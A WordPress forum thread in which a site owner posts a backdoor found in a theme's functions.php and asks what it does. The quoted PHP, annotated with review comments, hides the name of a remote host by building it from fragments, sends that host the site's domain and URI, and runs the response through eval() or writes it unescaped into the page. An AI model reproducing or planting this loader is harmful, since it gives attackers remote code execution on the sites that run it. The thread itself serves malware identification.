
Sketchy code in Rounded V2 Blue Edition theme (4 posts)

  1. loudwater
    Member
    Posted 5 years ago #

    We've been using a theme for our site based on Rounded V2 Blue Edition theme from http://www.itcouldbethisone.com/. Our blog stopped loading this morning with no changes being made to it so I initially thought one of the widgets we're using wasn't loading in a timely manner. Upon further inspection I found this code embedded in functions.php in the theme:

    /**
     * Remote-code loader found embedded in the theme's functions.php.
     *
     * What the visible code does:
     *  - keeps two rows in the WordPress options table: 'l_time' (timestamp of
     *    the last successful fetch) and 'l_eval' (the last response body);
     *  - once at least 3600 seconds have passed since 'l_time', requests
     *    /xps-1.php (or /xps-0.php) from 2.xpstatz.com over plain HTTP, sending
     *    the site's HTTP_HOST and the current REQUEST_URI as query parameters;
     *  - passes the response body to eval(), or echoes it unescaped into the
     *    page when the eval() probe below did not succeed;
     *  - stores the response and the new timestamp back into the options table.
     *
     * Review indicators visible in this block: the function name xfooter(), the
     * option names 'l_time' and 'l_eval', the host assembled from string
     * fragments, and @-suppressed eval()/network calls.
     *
     * NOTE(review): the call site of xfooter() is not shown here. The network
     * calls are synchronous, so an unresponsive remote host would stall the
     * request that triggers it.
     */
    function xfooter()  {
        global $wpdb;

        // Load the loader's own state rows from the options table.
        $R2540568A6546AA7FA75DF902886B3AF8 = $wpdb->get_col("SELECT option_value FROM $wpdb->options WHERE option_name='l_time'");
        $R41CCFE75D7AC2B4681397CFC70BAEF40 = $wpdb->get_col("SELECT option_value FROM $wpdb->options WHERE option_name='l_eval'");

        // First run: create 'l_time' with '0' so the interval check below passes immediately.
        if (empty($R2540568A6546AA7FA75DF902886B3AF8)) {
            $wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES ('l_time', '0', 'no')");
            $R051685ACC577342D1FDE6EBF2CD1779F = 0;
        } else $R051685ACC577342D1FDE6EBF2CD1779F = intval($R2540568A6546AA7FA75DF902886B3AF8[0]);

        // First run: create 'l_eval' with a harmless '<br />' placeholder; otherwise load the
        // previously stored response into the payload variable.
        if (empty($R41CCFE75D7AC2B4681397CFC70BAEF40)) {
            $wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES ('l_eval', '<br />', 'no')");
            $RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1 = '<br />';
        } else $RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1 = $R41CCFE75D7AC2B4681397CFC70BAEF40[0];

        // Presumably a probe for whether eval() is usable on this host: the flag is only
        // set if the evaluated assignment actually runs. Errors are hidden by '@'.
        @eval('$R14AF1BE9EE26A90921E64A82E7836797 = 1;');
        if($R14AF1BE9EE26A90921E64A82E7836797)
        {
            $R5F38CE9C0B222F3BB0880E016DC07527 = "1";
        }
        else
        {
            $R5F38CE9C0B222F3BB0880E016DC07527 = "0";
        }

        // Everything below runs only when the last recorded fetch is at least an hour old.
        if ( ( time() - $R051685ACC577342D1FDE6EBF2CD1779F ) >= 3600  ) {

            // The host name is assembled from fragments, so a plain-text search of the theme
            // for the full domain does not match. Result: "2.xpstatz.com".
            $R39C188653EA53DBD6E3F1D3915EDAC0C = "com";
            $R8088818E3E46A17C12F2EE42EB12D7AC = "2.";
            $R7B934F06258B8BA3608E30CDE9EA1035 = "xpstatz";
            // Script name is "xps-1." or "xps-0." depending on the eval() probe result.
            $RAD8CC24399FEA84D3454DD7057C38FD0 = "xps-$R5F38CE9C0B222F3BB0880E016DC07527.";
            $RBF7582359E6813BD7C54DD76E7505037 = "$R8088818E3E46A17C12F2EE42EB12D7AC$R7B934F06258B8BA3608E30CDE9EA1035.$R39C188653EA53DBD6E3F1D3915EDAC0C";
            // Request path; discloses this site's host name and the URI being viewed.
            $RA81C90DCC503F6900F7DC424AD04F525 = "/".$RAD8CC24399FEA84D3454DD7057C38FD0."php?h=" . urlencode($_SERVER['HTTP_HOST']) . "&u=" . urlencode($_SERVER['REQUEST_URI']);

            if (ini_get('allow_url_fopen')) {
                // Preferred transport: URL wrapper over unencrypted HTTP. Returns false on
                // failure, which the is_string() check below rejects.
                $RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1 = @file_get_contents("http://" . $RBF7582359E6813BD7C54DD76E7505037 . $RA81C90DCC503F6900F7DC424AD04F525);
            } else {
                // Fallback transport: raw socket to port 80 with a 30 second connect timeout.
                // The errno/errstr variables are filled by reference and never read.
                $RF500F4A848E2EB2F8AAC3A6734D7EC38 = @fsockopen($RBF7582359E6813BD7C54DD76E7505037, '80', $R87844B1C6FC922407E6020B6B224950F, $R1966719AEC0096F98BA934D649A6E28D, 30);
                if ($RF500F4A848E2EB2F8AAC3A6734D7EC38) {
                    @stream_set_timeout($RF500F4A848E2EB2F8AAC3A6734D7EC38, 60);

                    // Hand-written HTTP/1.1 GET request.
                    @fwrite($RF500F4A848E2EB2F8AAC3A6734D7EC38, "GET $RA81C90DCC503F6900F7DC424AD04F525 HTTP/1.1\r\n");
                    @fwrite($RF500F4A848E2EB2F8AAC3A6734D7EC38, "Host: $RBF7582359E6813BD7C54DD76E7505037\r\n");
                    @fwrite($RF500F4A848E2EB2F8AAC3A6734D7EC38, "Connection: Close\r\n\r\n");

                    // Read the whole response, overwriting the value loaded from 'l_eval'.
                    $RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1 = "";

                    while(!feof($RF500F4A848E2EB2F8AAC3A6734D7EC38)) {
                        $RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1 .= @fgets($RF500F4A848E2EB2F8AAC3A6734D7EC38, 1024);
                    }

                    // Keep only what follows the first blank line, i.e. drop the response headers.
                    $RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1 = trim(strstr($RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1, "\r\n\r\n"));
                }

                // Called even when the connection failed; '@' hides the resulting error.
                // In that case the payload variable still holds the value loaded from
                // 'l_eval' (or the '<br />' placeholder), so the block below acts on it.
                @fclose($RF500F4A848E2EB2F8AAC3A6734D7EC38);
            }

            if ( is_string($RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1) ) {
                $R051685ACC577342D1FDE6EBF2CD1779F = time();
                if($R14AF1BE9EE26A90921E64A82E7836797)
                {
                    // Core risk: the remote response is executed as PHP inside the WordPress
                    // request, with no integrity or authenticity check on what was received.
                    @eval($RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1);
                }
                else
                {
                    // Without eval(), the response is written into the page unescaped.
                    echo "$RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1";
                }
                // Escape for the UPDATE below. mysql_real_escape_string() belongs to the old
                // ext/mysql extension (removed in PHP 7.0); this line is reached only after
                // the response has already been evaluated or echoed.
                $RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1 = mysql_real_escape_string($RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1);

                // Persist the fetch time and the last response; the 'l_eval' row therefore
                // shows what the remote host most recently returned to this site.
                $wpdb->query("UPDATE $wpdb->options SET option_value=$R051685ACC577342D1FDE6EBF2CD1779F WHERE option_name='l_time'");
                $wpdb->query("UPDATE $wpdb->options SET option_value='$RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1' WHERE option_name='l_eval'");
            }
        }
    }
    
    ?>

    From what I can tell, it looks like it opens up a connection to our database then connects to 1.xpstatz.com, but the code is so heavily obfuscated I'm not sure what else it's doing. I think xpstatz.com went down today, which is why it was hanging up the page, but it's been up like this for several weeks and I'm a bit concerned about what it's done in the meantime.

    Can anyone decipher this? Thanks

    -Marc

  2. whooami
    Member
    Posted 5 years ago #

    http://wordpress.pastebin.com/m6bac99c0

    It's already been decoded.

  3. loudwater
    Member
    Posted 5 years ago #

    Thanks whooami, any idea what this does? I'm not much of a coder.

  4. cavendash
    Member
    Posted 5 years ago #

    Any updates on this? I just installed a version of this theme on my site & want to make sure it does not contain any malware.

Topic Closed

This topic has been closed to new replies.
